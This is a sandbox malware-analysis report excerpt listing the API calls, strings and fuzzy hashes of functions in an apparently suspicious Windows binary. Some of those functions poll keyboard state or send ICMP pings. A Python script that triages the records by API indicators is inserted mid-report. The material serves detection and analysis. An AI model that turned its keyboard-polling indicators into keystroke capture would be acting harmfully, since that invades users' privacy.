                            • Instruction ID: ff56f14fbe79d0140aec27b1cc4e1cbd67d087de96b6e07e2a84deec929bf653
                            • Opcode Fuzzy Hash: 213242d82be573809fbb9873604f0d28c5881870f37487220602967ee0698eed
                            • Instruction Fuzzy Hash: 1D618C34110706DFDB35AF69EA88B39B7F5FB46321F104519E29686D70CB70A8D1EB40
                            APIs
                              • Part of subcall function 0009B155: GetWindowLongW.USER32(?,000000EB), ref: 0009B166
                            • GetSysColor.USER32(0000000F), ref: 0009B067
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ColorLongWindow
                            • String ID:
                            • API String ID: 259745315-0
                            • Opcode ID: 7d2c5e7190c2853a9b7c53f325f5c356fda323ec52308ec6bf32fd718ac45bba
                            • Instruction ID: 8297932b145eb600d632915545a2e3b44f2f30994100446df648d34b0fc83115
                            • Opcode Fuzzy Hash: 7d2c5e7190c2853a9b7c53f325f5c356fda323ec52308ec6bf32fd718ac45bba
                            • Instruction Fuzzy Hash: C141C431100154AFDF205F78ED88BBA3BA5AB46730F144361FEB58A5E2C7718C81EB21
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                            • String ID:
                            • API String ID: 136442275-0
                            • Opcode ID: a69738df2aca275a7f1b492e3f0c115ae816235bb0b211c8946ab37b263f2381
                            • Instruction ID: 191d148c8cd2a89ca2e8d16d67eca468ee211d034ce57a9947ec14cb5eb8c29e
                            • Opcode Fuzzy Hash: a69738df2aca275a7f1b492e3f0c115ae816235bb0b211c8946ab37b263f2381
                            • Instruction Fuzzy Hash: 7041FCB290412CAADB65EB90DC55EDF73BCAB09310F1041E6B519A2052EB71ABD4CFA4
                            APIs
                            • __swprintf.LIBCMT ref: 000884E5
                            • __itow.LIBCMT ref: 00088519
                              • Part of subcall function 000A2177: _xtow@16.LIBCMT ref: 000A2198
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __itow__swprintf_xtow@16
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 1502193981-2263619337
                            • Opcode ID: f849a9570708a0a33a2b2bfcc4aa47e8bb6af46cd02a59b8247dcaaf1bb0caba
                            • Instruction ID: e642d4d23597051ad5ade35f501b74eb0291be063dd81f21d1c55164df1dcb57
                            • Opcode Fuzzy Hash: f849a9570708a0a33a2b2bfcc4aa47e8bb6af46cd02a59b8247dcaaf1bb0caba
                            • Instruction Fuzzy Hash: 8F41D372600A099BDB24EF78DC41EBA77E9BF45310F60846EE689D7192EA31DA41DB10
                            APIs
                            • _memset.LIBCMT ref: 000A5CCA
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • __gmtime64_s.LIBCMT ref: 000A5D63
                            • __gmtime64_s.LIBCMT ref: 000A5D99
                            • __gmtime64_s.LIBCMT ref: 000A5DB6
                            • __allrem.LIBCMT ref: 000A5E0C
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A5E28
                            • __allrem.LIBCMT ref: 000A5E3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A5E5D
                            • __allrem.LIBCMT ref: 000A5E74
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A5E92
                            • __invoke_watson.LIBCMT ref: 000A5F03
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                            • String ID:
                            • API String ID: 384356119-0
                            • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                            • Instruction ID: fd88dfd821e0212eadb48daab56d0ab04331dd9e555273c81a312013f093d32c
                            • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                            • Instruction Fuzzy Hash: 8871C871A01B16ABD724DFB8CC42BEA73E8BF12765F158129F514D7682EB70DE408B90
                            APIs
                            • _memset.LIBCMT ref: 000C5816
                            • GetMenuItemInfoW.USER32(001418F0,000000FF,00000000,00000030), ref: 000C5877
                            • SetMenuItemInfoW.USER32(001418F0,00000004,00000000,00000030), ref: 000C58AD
                            • Sleep.KERNEL32(000001F4), ref: 000C58BF
                            • GetMenuItemCount.USER32(?), ref: 000C5903
                            • GetMenuItemID.USER32(?,00000000), ref: 000C591F
                            • GetMenuItemID.USER32(?,-00000001), ref: 000C5949
                            • GetMenuItemID.USER32(?,?), ref: 000C598E
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C59D4
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C59E8
                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C5A09
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                            • String ID:
                            • API String ID: 4176008265-0
                            • Opcode ID: 6a299100a7fb43875d177a2bd3f461eb7e6c83cd382ebac2b9ca33ff965577b8
                            • Instruction ID: 828428f900a92d2cad5a810672abe3e24ba63df718da4be3d001847f55cf744b
                            • Opcode Fuzzy Hash: 6a299100a7fb43875d177a2bd3f461eb7e6c83cd382ebac2b9ca33ff965577b8
                            • Instruction Fuzzy Hash: 02619D78900A49EFDB20CFA4DC88FAE7BB8EB05359F14015DF882A3251D771AD85CB21
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000E9AA5
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000E9AA8
                            • GetWindowLongW.USER32(?,000000F0), ref: 000E9ACC
                            • _memset.LIBCMT ref: 000E9ADD
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000E9AEF
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000E9B67
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow_memset
                            • String ID:
                            • API String ID: 830647256-0
                            • Opcode ID: c16988c9ebe178db197f60ddc07f6f737e05ab036165d9eb0ac807864654abee
                            • Instruction ID: 3227de8525768ef54326161edaca199e6167fc1d4e0b5816ff297e493ce59396
                            • Opcode Fuzzy Hash: c16988c9ebe178db197f60ddc07f6f737e05ab036165d9eb0ac807864654abee
                            • Instruction Fuzzy Hash: 40616B75A00248AFDB21DFA4CD81EEE77F8EF09700F14015AFA15E72A2D770A981DB90
                            APIs
                            • GetKeyboardState.USER32(?), ref: 000C3591
                            • GetAsyncKeyState.USER32(000000A0), ref: 000C3612
                            • GetKeyState.USER32(000000A0), ref: 000C362D
                            • GetAsyncKeyState.USER32(000000A1), ref: 000C3647
                            • GetKeyState.USER32(000000A1), ref: 000C365C
                            • GetAsyncKeyState.USER32(00000011), ref: 000C3674
                            • GetKeyState.USER32(00000011), ref: 000C3686
                            • GetAsyncKeyState.USER32(00000012), ref: 000C369E
                            • GetKeyState.USER32(00000012), ref: 000C36B0
                            • GetAsyncKeyState.USER32(0000005B), ref: 000C36C8
                            • GetKeyState.USER32(0000005B), ref: 000C36DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 86444dab1c2488e2ed3dd4c7c5be88a70dab2674a6a54f666d586461cf1cd828
                            • Instruction ID: 0db61f9c4e63f8c8e9b69a75b5f47020d531df97e4524b0c7d3553c85c95acbd
                            • Opcode Fuzzy Hash: 86444dab1c2488e2ed3dd4c7c5be88a70dab2674a6a54f666d586461cf1cd828
                            • Instruction Fuzzy Hash: 9E41E570514BC97DFFB097A49814BADBEE06B11348F04C04DD9C2466C2EBE49BC8CBA2
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000BA2AA
                            • SafeArrayAllocData.OLEAUT32(?), ref: 000BA2F5
                            • VariantInit.OLEAUT32(?), ref: 000BA307
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 000BA327
                            • VariantCopy.OLEAUT32(?,?), ref: 000BA36A
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 000BA37E
                            • VariantClear.OLEAUT32(?), ref: 000BA393
                            • SafeArrayDestroyData.OLEAUT32(?), ref: 000BA3A0
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000BA3A9
                            • VariantClear.OLEAUT32(?), ref: 000BA3BB
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000BA3C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 141b8f1b07562a6b0e49478fb58b41403317a22522197e4a0c3b8f075e8d556e
                            • Instruction ID: 94b190dfc7264fbcd42aa81e27a04713de32feada7a5edaab5c6f2d574df9de9
                            • Opcode Fuzzy Hash: 141b8f1b07562a6b0e49478fb58b41403317a22522197e4a0c3b8f075e8d556e
                            • Instruction Fuzzy Hash: E9412C75A00219AFCB01EFE4D8889DEBFB9FF48714F108065F541E3661DB71AA85CBA1
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • CoInitialize.OLE32 ref: 000DB298
                            • CoUninitialize.OLE32 ref: 000DB2A3
                            • CoCreateInstance.OLE32(?,00000000,00000017,0010D8FC,?), ref: 000DB303
                            • IIDFromString.OLE32(?,?), ref: 000DB376
                            • VariantInit.OLEAUT32(?), ref: 000DB410
                            • VariantClear.OLEAUT32(?), ref: 000DB471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 834269672-1287834457
                            • Opcode ID: 9365126728acab5b704aadf05231f2a05ca4faf2a4ffe85f75ec2407a2bb7939
                            • Instruction ID: e79ed5b01a2974ed11849e4433df9abc5cd09d8c85bf710f4e82857c741b4d12
                            • Opcode Fuzzy Hash: 9365126728acab5b704aadf05231f2a05ca4faf2a4ffe85f75ec2407a2bb7939
                            • Instruction Fuzzy Hash: 8B618A31604711EFC720DF54C885BAEB7E8AF89714F05481EF9859B292CB70EE44CBA2
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 000D86F5
                            • inet_addr.WSOCK32(?,?,?), ref: 000D873A
                            • gethostbyname.WSOCK32(?), ref: 000D8746
                            • IcmpCreateFile.IPHLPAPI ref: 000D8754
                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000D87C4
                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000D87DA
                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 000D884F
                            • WSACleanup.WSOCK32 ref: 000D8855
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                            • String ID: Ping
                            • API String ID: 1028309954-2246546115
                            • Opcode ID: 1d4df85ac41883eb13d4d731a3560097003cdde37a358fc6e469807f537f3c29
                            • Instruction ID: 08690973fb38c1c6b74ac8c8e34c34b61e6eb36aca57822bee80e38658affb6d
                            • Opcode Fuzzy Hash: 1d4df85ac41883eb13d4d731a3560097003cdde37a358fc6e469807f537f3c29
                            • Instruction Fuzzy Hash: B951A0316043019FD720EF64CC89B6ABBE4AF48720F14892AF595DB3A1DF70E841DB51
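The two records above (the function that polls GetAsyncKeyState/GetKeyState for 0xA0, 0xA1, 0x11, 0x12 and 0x5B, and the IcmpCreateFile/IcmpSendEcho function tagged "Ping") are the kind of listing an analyst wants to triage mechanically rather than read one by one. The following Python script is an added example, not code from the report, from Joe Sandbox or from the sample: it parses function records in the report's own "APIs / Similarity" layout, groups the API calls per function, and applies a few API-set indicators to each. SAMPLE is a constructed excerpt of those two records; the indicator labels are the example's own, and the VK_ names come from the winuser.h virtual-key constants. Decoding the arguments shows that the keyboard function only reads modifier keys and that the echo call uses a 0xFA0 = 4000 ms timeout, which is the difference between a hotkey/modifier check and keystroke capture.

```python
"""Parse Joe Sandbox IDA-plugin function records and triage them by API use.
Added example, not code from the report, Joe Sandbox or the sample; SAMPLE is
a constructed excerpt of two of the report's records in its own layout."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 000C3591
• GetAsyncKeyState.USER32(000000A0), ref: 000C3612
• GetKeyState.USER32(000000A0), ref: 000C362D
• GetAsyncKeyState.USER32(00000011), ref: 000C3674
• GetAsyncKeyState.USER32(0000005B), ref: 000C36C8
Similarity
• API ID: State$Async$Keyboard
• String ID:
• Instruction Fuzzy Hash: 9E41E570514BC97DFFB097A49814BADBEE06B11348F04C04DD9C2466C2EBE49BC8CBA2
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 000D86F5
• IcmpCreateFile.IPHLPAPI ref: 000D8754
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000D87C4
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• Instruction Fuzzy Hash: B951A0316043019FD720EF64CC89B6ABBE4AF48720F14892AF595DB3A1DF70E841DB51
"""

# One "• Name.MODULE(args), ref: ADDR" line; subcall prefix and args are optional.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+: )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]   # raw hex arguments, "?" where the sandbox could not resolve one
    ref: int          # call-site address

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

def parse_records(text: str) -> list[FunctionRecord]:
    """Start a new record at each 'APIs' header and collect what follows it."""
    records: list[FunctionRecord] = []
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            records.append(FunctionRecord())
        elif not records:
            continue
        elif m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            records[-1].calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif line.startswith("• API ID: "):
            records[-1].api_id = line.split(": ", 1)[1]
        elif line.startswith("• String ID:"):
            records[-1].string_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash: "):
            records[-1].fuzzy_hash = line.split(": ", 1)[1]
    return records

# API sets that together evidence a behaviour worth a second look (labels are this example's).
INDICATORS = {
    "polls keyboard state": {"GetAsyncKeyState", "GetKeyState"},
    "sends ICMP echo (ping)": {"IcmpCreateFile", "IcmpSendEcho"},
    "instantiates COM object": {"CoCreateInstance"},
}
# Modifier virtual-key codes (winuser.h); a function that polls only these is
# checking modifier state, not capturing printable keystrokes.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

def triage(rec: FunctionRecord) -> list[str]:
    """Labels of every indicator whose API set is fully present in the record."""
    names = {c.name for c in rec.calls}
    return [label for label, apis in INDICATORS.items() if apis <= names]

def polled_keys(rec: FunctionRecord) -> dict[int, str]:
    """Virtual-key codes passed to GetAsyncKeyState/GetKeyState, named where known."""
    keys: dict[int, str] = {}
    for c in rec.calls:
        if c.name in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] != "?":
            vk = int(c.args[0], 16)
            keys[vk] = VK_NAMES.get(vk, f"VK_0x{vk:02X}")
    return keys

def icmp_timeout_ms(rec: FunctionRecord) -> int | None:
    """Timeout, the eighth IcmpSendEcho parameter, of the record's first echo call."""
    for c in rec.calls:
        if c.name == "IcmpSendEcho" and len(c.args) == 8 and c.args[7] != "?":
            return int(c.args[7], 16)
    return None
```

Run it over the full report text instead of SAMPLE and `triage` gives a per-function label list while `fuzzy_hash` can be carried along for clustering against other samples; extend INDICATORS with the API sets you care about (for instance the SafeArray/Variant or CoCreateInstance sequences shown further up) rather than matching on single API names, since one call such as GetKeyState on its own is common in benign UI code.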
                            APIs
                            • _memset.LIBCMT ref: 000E9C68
                            • CreateMenu.USER32 ref: 000E9C83
                            • SetMenu.USER32(?,00000000), ref: 000E9C92
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000E9D1F
                            • IsMenu.USER32(?), ref: 000E9D35
                            • CreatePopupMenu.USER32 ref: 000E9D3F
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000E9D70
                            • DrawMenuBar.USER32 ref: 000E9D7E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                            • String ID: 0
                            • API String ID: 176399719-4108050209
                            • Opcode ID: adbafe72451f35d0b888b7719bd710f2058a19654cc110b7a91aa631050bb7ef
                            • Instruction ID: 6e3bd0d7c03bd12dd99975314fdde12bff152921a4138f216fc633261c9797bb
                            • Opcode Fuzzy Hash: adbafe72451f35d0b888b7719bd710f2058a19654cc110b7a91aa631050bb7ef
                            • Instruction Fuzzy Hash: 0A413579A04249AFDB24EFA5EC84BDABBF9FF49314F140028E945A7361D770A950CF60
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CEC1E
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000CEC94
                            • GetLastError.KERNEL32 ref: 000CEC9E
                            • SetErrorMode.KERNEL32(00000000,READY), ref: 000CED0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            • Opcode ID: d644274a6e9bfcac184a07fd17d9edfafb92298e6bef25a45f7e56d2013393d1
                            • Instruction ID: c297d7d442d17aaf9d3ce769864932298eb0ea46c096b40126ae714bd2d531c5
                            • Opcode Fuzzy Hash: d644274a6e9bfcac184a07fd17d9edfafb92298e6bef25a45f7e56d2013393d1
                            • Instruction Fuzzy Hash: E131A135A002499FDB10EFA4C989FEEB7B4FF44710F14802AF506E7292DB719A42CB91
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000BC782
                            • GetDlgCtrlID.USER32 ref: 000BC78D
                            • GetParent.USER32 ref: 000BC7A9
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000BC7AC
                            • GetDlgCtrlID.USER32(?), ref: 000BC7B5
                            • GetParent.USER32(?), ref: 000BC7D1
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000BC7D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 313823418-1403004172
                            • Opcode ID: d049cf7cebc56516aa6eee3fbe73e34d1da5ccd6238dea8a820567cef8e00dc3
                            • Instruction ID: 60719e1838fa3ea76b96e5694705ed75d9785e7d7ea9877824bd19fd8a72532c
                            • Opcode Fuzzy Hash: d049cf7cebc56516aa6eee3fbe73e34d1da5ccd6238dea8a820567cef8e00dc3
                            • Instruction Fuzzy Hash: 6A21A174940208BFEB05EBA4CC85EFEB7B5EF49310F104115F5A2D32D2DBB55956AB20
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000BC869
                            • GetDlgCtrlID.USER32 ref: 000BC874
                            • GetParent.USER32 ref: 000BC890
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000BC893
                            • GetDlgCtrlID.USER32(?), ref: 000BC89C
                            • GetParent.USER32(?), ref: 000BC8B8
